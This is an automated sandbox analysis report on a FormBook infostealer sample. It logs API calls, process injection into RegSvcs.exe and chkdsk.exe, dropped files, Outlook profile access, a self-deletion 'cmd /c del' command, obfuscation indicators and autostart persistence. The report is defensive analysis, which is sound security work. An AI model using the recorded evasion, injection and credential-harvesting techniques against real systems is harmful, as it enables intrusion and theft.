Source: chkdsk.exe, 00000005.00000002.476016156.00000000054B6000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033leH
Source: chkdsk.exe, 00000005.00000002.475930032.0000000005497000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033B
Source: chkdsk.exe, 00000005.00000002.476043438.00000000054C0000.00000004.00000001.sdmp, chkdsk.exe, 00000005.00000003.362069165.00000000054BE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: chkdsk.exe, 00000005.00000002.476043438.00000000054C0000.00000004.00000001.sdmp, chkdsk.exe, 00000005.00000003.363122009.00000000054BE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: vSCyL8NNIC.exe, 00000000.00000002.221143021.000000000110A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Detected FormBook malwareShow sources
Source: C:\Windows\SysWOW64\chkdsk.exeDropped file: C:\Users\user\AppData\Roaming\0LA072R5\0LAlogri.iniJump to dropped file
Source: C:\Windows\SysWOW64\chkdsk.exeDropped file: C:\Users\user\AppData\Roaming\0LA072R5\0LAlogrv.iniJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419CA0 NtCreateFile,1_2_00419CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419D50 NtReadFile,1_2_00419D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419DD0 NtClose,1_2_00419DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419E80 NtAllocateVirtualMemory,1_2_00419E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419CF2 NtCreateFile,1_2_00419CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419D4A NtReadFile,1_2_00419D4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419DCA NtClose,1_2_00419DCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419E7B NtAllocateVirtualMemory,1_2_00419E7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F398F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00F398F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00F39860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39840 NtDelayExecution,LdrInitializeThunk,1_2_00F39840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F399A0 NtCreateSection,LdrInitializeThunk,1_2_00F399A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00F39910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39A50 NtCreateFile,LdrInitializeThunk,1_2_00F39A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39A20 NtResumeThread,LdrInitializeThunk,1_2_00F39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00F39A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F395D0 NtClose,LdrInitializeThunk,1_2_00F395D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39540 NtReadFile,LdrInitializeThunk,1_2_00F39540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F396E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00F396E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00F39660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F397A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00F397A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39780 NtMapViewOfSection,LdrInitializeThunk,1_2_00F39780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39710 NtQueryInformationToken,LdrInitializeThunk,1_2_00F39710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F398A0 NtWriteVirtualMemory,1_2_00F398A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F3B040 NtSuspendThread,1_2_00F3B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39820 NtEnumerateKey,1_2_00F39820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F399D0 NtCreateProcessEx,1_2_00F399D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39950 NtQueueApcThread,1_2_00F39950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39A80 NtOpenDirectoryObject,1_2_00F39A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39A10 NtQuerySection,1_2_00F39A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F3A3B0 NtGetContextThread,1_2_00F3A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39B00 NtSetValueKey,1_2_00F39B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F395F0 NtQueryInformationFile,1_2_00F395F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39560 NtWriteFile,1_2_00F39560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F3AD30 NtSetContextThread,1_2_00F3AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39520 NtWaitForSingleObject,1_2_00F39520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F396D0 NtCreateKey,1_2_00F396D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39670 NtQueryInformationProcess,1_2_00F39670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39650 NtQueryValueKey,1_2_00F39650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39610 NtEnumerateValueKey,1_2_00F39610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39FE0 NtCreateMutant,1_2_00F39FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39770 NtSetInformationFile,1_2_00F39770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F3A770 NtOpenThread,1_2_00F3A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39760 NtOpenProcess,1_2_00F39760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F39730 NtQueryVirtualMemory,1_2_00F39730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F3A710 NtOpenProcessToken,1_2_00F3A710
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A399A0 NtCreateSection,LdrInitializeThunk,5_2_05A399A0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A395D0 NtClose,LdrInitializeThunk,5_2_05A395D0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_05A39910
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39560 NtWriteFile,LdrInitializeThunk,5_2_05A39560
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39540 NtReadFile,LdrInitializeThunk,5_2_05A39540
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39860 NtQuerySystemInformation,LdrInitializeThunk,5_2_05A39860
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39840 NtDelayExecution,LdrInitializeThunk,5_2_05A39840
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39780 NtMapViewOfSection,LdrInitializeThunk,5_2_05A39780
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39FE0 NtCreateMutant,LdrInitializeThunk,5_2_05A39FE0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39B00 NtSetValueKey,LdrInitializeThunk,5_2_05A39B00
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39710 NtQueryInformationToken,LdrInitializeThunk,5_2_05A39710
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39770 NtSetInformationFile,LdrInitializeThunk,5_2_05A39770
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A396E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_05A396E0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A396D0 NtCreateKey,LdrInitializeThunk,5_2_05A396D0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39610 NtEnumerateValueKey,LdrInitializeThunk,5_2_05A39610
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_05A39660
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39A50 NtCreateFile,LdrInitializeThunk,5_2_05A39A50
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39650 NtQueryValueKey,LdrInitializeThunk,5_2_05A39650
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A395F0 NtQueryInformationFile,5_2_05A395F0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A399D0 NtCreateProcessEx,5_2_05A399D0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39520 NtWaitForSingleObject,5_2_05A39520
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A3AD30 NtSetContextThread,5_2_05A3AD30
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39950 NtQueueApcThread,5_2_05A39950
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A398A0 NtWriteVirtualMemory,5_2_05A398A0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A398F0 NtReadVirtualMemory,5_2_05A398F0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39820 NtEnumerateKey,5_2_05A39820
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A3B040 NtSuspendThread,5_2_05A3B040
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A397A0 NtUnmapViewOfSection,5_2_05A397A0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A3A3B0 NtGetContextThread,5_2_05A3A3B0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39730 NtQueryVirtualMemory,5_2_05A39730
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A3A710 NtOpenProcessToken,5_2_05A3A710
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39760 NtOpenProcess,5_2_05A39760
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A3A770 NtOpenThread,5_2_05A3A770
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39A80 NtOpenDirectoryObject,5_2_05A39A80
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39A20 NtResumeThread,5_2_05A39A20
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39A00 NtProtectVirtualMemory,5_2_05A39A00
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39A10 NtQuerySection,5_2_05A39A10
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A39670 NtQueryInformationProcess,5_2_05A39670
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01269D50 NtReadFile,5_2_01269D50
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01269DD0 NtClose,5_2_01269DD0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01269CA0 NtCreateFile,5_2_01269CA0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01269E80 NtAllocateVirtualMemory,5_2_01269E80
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01269D4A NtReadFile,5_2_01269D4A
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01269DCA NtClose,5_2_01269DCA
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01269CF2 NtCreateFile,5_2_01269CF2
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01269E7B NtAllocateVirtualMemory,5_2_01269E7B
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_05FD5F200_2_05FD5F20
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_05FD55600_2_05FD5560
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_05FD55520_2_05FD5552
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_05FD2CEB0_2_05FD2CEB
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_05FD00400_2_05FD0040
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_05FD00060_2_05FD0006
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_05FD5F110_2_05FD5F11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004010301_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041D2201_2_0041D220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402D901_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E61A1_2_0041E61A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409E201_2_00409E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041D6951_2_0041D695
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CF071_2_0041CF07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402FB01_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F220A01_2_00F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FC20A81_2_00FC20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0B0901_2_00F0B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FB10021_2_00FB1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F141201_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EFF9001_2_00EFF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FC22AE1_2_00FC22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FBDBD21_2_00FBDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2EBB01_2_00F2EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FC2B281_2_00FC2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0841F1_2_00F0841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0D5E01_2_00F0D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F225811_2_00F22581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FC1D551_2_00FC1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF0D201_2_00EF0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FC2D071_2_00FC2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FC2EF71_2_00FC2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F16E301_2_00F16E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FC1FF11_2_00FC1FF1
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A225815_2_05A22581
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A0D5E05_2_05A0D5E0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A141205_2_05A14120
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_059FF9005_2_059FF900
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_059F0D205_2_059F0D20
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05AC1D555_2_05AC1D55
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A0B0905_2_05A0B090
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05AB10025_2_05AB1002
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A0841F5_2_05A0841F
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A2EBB05_2_05A2EBB0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A16E305_2_05A16E30
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0126D2205_2_0126D220
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01252D905_2_01252D90
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0126CF075_2_0126CF07
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01252FB05_2_01252FB0
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01259E205_2_01259E20
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0126E61A5_2_0126E61A
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0126D6955_2_0126D695
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 059FB150 appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00EFB150 appears 35 times
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEminem.dll< vs vSCyL8NNIC.exe
Source: vSCyL8NNIC.exe, 00000000.00000002.221143021.000000000110A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs vSCyL8NNIC.exe
Source: vSCyL8NNIC.exe, 00000000.00000002.220635050.0000000000A00000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameM7v3.exeF vs vSCyL8NNIC.exe
Source: vSCyL8NNIC.exeBinary or memory string: OriginalFilenameM7v3.exeF vs vSCyL8NNIC.exe
Source: vSCyL8NNIC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vSCyL8NNIC.exe, SecurityZone.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.vSCyL8NNIC.exe.990000.0.unpack, SecurityZone.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.vSCyL8NNIC.exe.990000.0.unpack, SecurityZone.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engineClassification label: mal100.spyw.evad.winEXE@8/4@4/3
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vSCyL8NNIC.exe.logJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_01
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeMutant created: \Sessions\1\BaseNamedObjects\APQcTUzEjTQLpnuTDhnfLG
Source: vSCyL8NNIC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\0LA072R5\0LAlogri.iniJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: vSCyL8NNIC.exeVirustotal: Detection: 23%
Source: vSCyL8NNIC.exeReversingLabs: Detection: 22%
Source: unknownProcess created: C:\Users\user\Desktop\vSCyL8NNIC.exe 'C:\Users\user\Desktop\vSCyL8NNIC.exe'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeFile written: C:\Users\user\AppData\Roaming\0LA072R5\0LAlogri.iniJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
Source: vSCyL8NNIC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vSCyL8NNIC.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: vSCyL8NNIC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: chkdsk.pdbGCTL source: RegSvcs.exe, 00000001.00000002.258819108.0000000000EA0000.00000040.00000001.sdmp
Source: Binary string: chkdsk.pdb source: RegSvcs.exe, 00000001.00000002.258819108.0000000000EA0000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: chkdsk.exe, 00000005.00000002.478323114.0000000005EFF000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000002.258842065.0000000000ED0000.00000040.00000001.sdmp, chkdsk.exe, 00000005.00000002.476452104.00000000059D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, chkdsk.exe
Source: Binary string: RegSvcs.pdb source: chkdsk.exe, 00000005.00000002.478323114.0000000005EFF000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Binary contains a suspicious time stampShow sources
Source: initial sampleStatic PE information: 0xEBD2DDE0 [Tue May 17 10:05:20 2095 UTC]
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_00995C4B push ss; iretd 0_2_00995C56
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_009955CF push cs; retf 0_2_00995C20
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_00999302 push ss; iretd 0_2_00999606
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_00995C21 push ss; iretd 0_2_00995C4A
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeCode function: 0_2_00995B66 push cs; retf 0_2_00995C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040E2E8 push edi; retf 1_2_0040E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CDF5 push eax; ret 1_2_0041CE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041759B push esp; ret 1_2_004175AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CE42 push eax; ret 1_2_0041CE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CE4B push eax; ret 1_2_0041CEB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041CEAC push eax; ret 1_2_0041CEB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040EF48 pushfd ; ret 1_2_0040EF4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041778F push ds; ret 1_2_00417798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00416F93 push ss; iretd 1_2_00416FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F4D0D1 push ecx; ret 1_2_00F4D0E4
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_05A4D0D1 push ecx; ret 5_2_05A4D0E4
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0125E2E8 push edi; retf 5_2_0125E2E9
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0126759B push esp; ret 5_2_012675AF
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0126CDF5 push eax; ret 5_2_0126CE48
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0125EF48 pushfd ; ret 5_2_0125EF4B
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0126778F push ds; ret 5_2_01267798
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_01266F93 push ss; iretd 5_2_01266FA4
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0126CE42 push eax; ret 5_2_0126CE48
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0126CE4B push eax; ret 5_2_0126CEB2
Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 5_2_0126CEAC push eax; ret 5_2_0126CEB2
Source: initial sampleStatic PE information: section name: .text entropy: 7.93708714447

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
